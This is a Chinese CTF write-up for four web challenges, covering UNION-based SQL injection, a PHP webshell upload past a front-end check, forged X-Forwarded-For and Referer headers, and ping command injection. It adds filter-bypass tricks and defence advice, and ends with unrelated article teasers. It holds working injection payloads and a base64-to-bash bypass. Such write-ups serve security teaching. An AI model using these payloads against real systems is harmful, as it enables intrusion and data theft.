双剑破天门:攻防世界Web题解之独孤九剑心法(七)

双剑破天门:攻防世界Web题解之独孤九剑心法(七)

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任


**本文以攻防世界部分题为例进行演示,后续会对攻防世界大部分的web题目进行演示,如果你感兴趣请关注**


目录

一:Newscenter

二:upload1

三:Xff_referer

四:Command_execution

五:总结

1. Newscenter(SQL注入)

2. upload1(文件上传漏洞)

3. Xff_referer(HTTP头伪造)

4. Command_execution(命令注入)


一:Newscenter

打开为如下所示

经过尝试,得知在输入框中输入数字可得到不同内容

输入23就没有新闻

所以我们得知这个输入框和数据库有交互,那这题考察的可能就是SQL注入

发现将数据库中所有的内容都查询了出来,那这个题考察的就是SQL注入

字段长度为3

23' order by 3 #

回显字段有2,3

23' union select 1,2,3 #

数据库名为news

23' union select 1,database(),3 #

表名为如下

23' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="news" #

根据表名查到列名

23' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="secret_table" #

成功拿到flag

23' union select 1,fl4g,3 from secret_table #

二:upload1

发现有提示框提示需要上传图片,既然是提示框那就说明是前端验证

关闭如下所示

然后我们上传一张php即可

用蚁剑连接即可

成功拿到flag


三:Xff_referer

打开提示我们ip必须为123.123.123.123,那我们得知既然要ip来自于123,那就需要进行伪造ip头也就是X-Forwarded-For字段

打开bp进行抓包

输入X-Forwarded-For:123.123.123.123 进行伪造

发送后又提示我们来源为google

来源字段是referer

伪造referer字段


四:Command_execution

打开发现为ping功能,我们先随便ping一下然后再看看能否查看其他数据

Ping 127.0.0.1 发现可以,那我们填写这样的payload:127.0.0.1 | ls

成功执行ls,说明没有任何过滤。那接下来就可以查找flag了

执行127.0.0.1 |find / -name “fl*”

发现可以文件如下

成功拿到flag


五:总结

1. Newscenter(SQL注入)

考察点

  • SQL注入漏洞:未对用户输入进行过滤,允许通过注入获取数据库信息。
  • 联合查询(UNION注入):通过构造联合查询语句获取敏感数据。

解题思路

  1. 探测注入点:在搜索框输入单引号',观察是否存在报错。
  2. 判断字段数:使用ORDER BY确定查询字段数(如' ORDER BY 3--)。
  3. 联合查询注入
    • 构造Payload:' UNION SELECT 1,2,database()-- 获取数据库名。
    • 继续查询表名(如information_schema.tables)、列名,最终读取flag字段。

关键技术

  • 报错注入或布尔盲注(根据回显情况选择)。
  • 利用information_schema数据库获取元数据。

防御建议

  • 使用预编译语句(Prepared Statements)。
  • 对输入进行严格的字符过滤和转义。

2. upload1(文件上传漏洞)

考察点

  • 文件上传绕过:绕过前端和后端对文件类型、内容的检测。
  • Webshell利用:上传m蚂获取服务器权限。

解题思路

  1. 绕过前端验证
    • 修改文件扩展名为.php,并抓包修改Content-Typeimage/jpeg
  2. 绕过后端检测
    • 使用图片m(在图片中嵌入PHP代码),或利用.htaccess文件设置解析规则(如AddType application/x-httpd-php .jpg)。
  3. 访问上传文件:通过上传路径访问Webshell,执行系统命令获取flag。

关键技术

  • 双写扩展名绕过(如up.php.phtml)。
  • 利用服务器解析漏洞(如Apache解析漏洞test.php.xxx)。

防御建议

  • 限制上传文件类型,使用白名单机制。
  • 重命名上传文件,避免直接执行。

3. Xff_referer(HTTP头伪造)

考察点

  • HTTP头伪造:伪造X-Forwarded-For(XFF)和Referer头绕过访问控制。
  • 本地访问限制:服务器仅允许特定来源或本地IP访问。

解题思路

  1. 伪造XFF头:使用Burp Suite拦截请求,添加X-Forwarded-For: 127.0.0.1伪装本地IP。
  2. 伪造Referer头:修改Referer为题目指定域名(如http://www.google.com)通过验证。

关键技术

  • 工具:Burp Suite/Postman修改请求头。
  • 理解HTTP头在访问控制中的作用。

防御建议

  • 避免依赖客户端可控的字段(如XFF、Referer)做权限验证。
  • 使用服务器端会话机制管理权限。

4. Command_execution(命令注入)

考察点

  • 命令注入漏洞:未过滤用户输入直接拼接系统命令。
  • 绕过过滤技巧:绕过空格、关键词黑名单等限制。

解题思路

  1. 探测注入点:输入127.0.0.1; ls尝试执行命令。
  2. 绕过过滤
    • 空格绕过:使用${IFS}%09(Tab的URL编码)。
    • 关键词绕过:用ca\tbase64编码命令(如echo "Y2F0IGZsYWc=" | base64 -d | bash)。
  3. 读取flag:通过cattac命令读取flag文件。

关键技术

  • 命令分隔符:;&|||
  • 通配符绕过:cat fla*

防御建议

  • 使用安全的API(如subprocess模块)替代直接执行命令。
  • 严格校验输入,禁止特殊字符。

(需要源代码及各类资料联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

Read more

机器人之仿真软件的使用(ABB RobotStudio)

机器人之仿真软件的使用(ABB RobotStudio)

坐标系: 基地坐标 大地坐标系 工具坐标系(TCP) 工件坐标系(用户[UserFrame]\工件[ObjectFrame]) 关节坐标系(jointtarget) 六轴机器人 1、平移:Ctrl+鼠标左键2、旋转:Ctrl+Shift+左键3、机械装置手动关节:设置每轴的数据            可以通过手动关节/手动线性调整单个轴的运动/旋转等操作,除此之外就是拉手动关节运动面板,控制机械手每轴的运动。 姿态:轴配置。 MoveL Target 10,v1000,z100,MyTool\wobj:=wobj0: MoveL Target 10,v1000,fine,MyTool\wobj:=wobj0; MoveL:直线运动 Target 10:

手把手教你部署Z-Image-Turbo,5分钟搞定AI绘画环境

手把手教你部署Z-Image-Turbo,5分钟搞定AI绘画环境 你是否还在为部署文生图模型时漫长的权重下载、复杂的依赖配置而头疼?现在,这一切都可以结束了。本文将带你5分钟内完成Z-Image-Turbo的完整部署,无需等待下载、不用手动安装依赖,真正实现“开箱即用”的AI绘画体验。 我们将使用预置了完整32.88GB模型权重的专用镜像,一键启动即可生成1024×1024高清图像,仅需9步推理,速度快到惊人。无论你是AI绘画新手,还是想快速测试效果的技术人员,这篇文章都能让你立刻上手。 准备好了吗?让我们开始吧。 1. 镜像简介:为什么选择Z-Image-Turbo? 1.1 模型核心优势 Z-Image-Turbo 是阿里达摩院基于 DiT(Diffusion Transformer)架构推出的高效文生图模型,专为高速高质量生成设计。相比传统扩散模型动辄20~50步的推理过程,它仅需9步即可输出细节丰富的图像,在RTX 4090D等高显存机型上几乎秒级出图。 更关键的是,本次使用的镜像已预置全部32.88GB模型权重文件,直接缓存在系统盘中,避免了动辄数小时的下载等

2026毕业季AIGC检测红线全解读:你的论文AI率达标了吗?

2026毕业季AIGC检测红线全解读:你的论文AI率达标了吗?

2026毕业季AIGC检测红线全解读:你的论文AI率达标了吗? 2026年的毕业季,AIGC检测已经从"建议执行"变成了"硬性要求"。 如果你还觉得"学校不会真查AI率",那你可能要吃大亏。从去年下半年开始,越来越多的高校把AIGC检测纳入了论文审核的必经流程,和查重放在同等位置。 这篇文章帮你理清三个核心问题:红线是多少、被查出来会怎样、怎么应对。 2026年各学历AIGC检测标准 经过整理主流高校的最新政策,大致标准如下: 学历层次AI率红线处理方式本科30%超过需修改后重新检测硕士15%-20%超过暂缓答辩,修改后复查博士10%超过取消答辩资格,需重新撰写期刊投稿视期刊而定核心期刊通常要求<10% 需要注意的是,这是目前多数985、211高校的标准。部分双非院校可能还没这么严格,但趋势很明确——标准只会越来越高,不会放松。 为什么今年特别严? 知网AIGC检测升级到3.0 2025年12月,知网AIGC检测算法从2.0升级到了3.0版本。新算法的检测维度从原来的3个增加到了7个,

Phi-3-mini-128k-instruct Chainlit插件开发:添加思维链可视化、Token用量统计面板

Phi-3-mini-128k-instruct Chainlit插件开发:添加思维链可视化、Token用量统计面板 你是不是也遇到过这种情况?用Chainlit调用大模型,模型回答得挺好,但你心里总有个问号:它到底是怎么“想”出这个答案的?每次对话消耗了多少计算资源?如果能让模型的“思考过程”和“资源消耗”变得一目了然,那该多好。 今天,我们就来解决这个问题。我将手把手教你为基于vLLM部署的Phi-3-mini-128k-instruct模型,开发两个实用的Chainlit插件:思维链可视化面板和Token用量统计面板。通过这两个插件,你不仅能“看见”模型的推理路径,还能精确掌握每次对话的成本,让AI对话从“黑盒”走向“透明”。 1. 项目准备与环境确认 在开始插件开发之前,我们先确保基础环境已经就绪。你已经按照官方说明,成功部署了Phi-3-mini-128k-instruct模型,并且能够通过Chainlit前端正常调用。 1.1 验证模型服务状态 打开终端,使用Webshell检查模型服务日志,确认部署成功。 cat /root/workspace/llm.l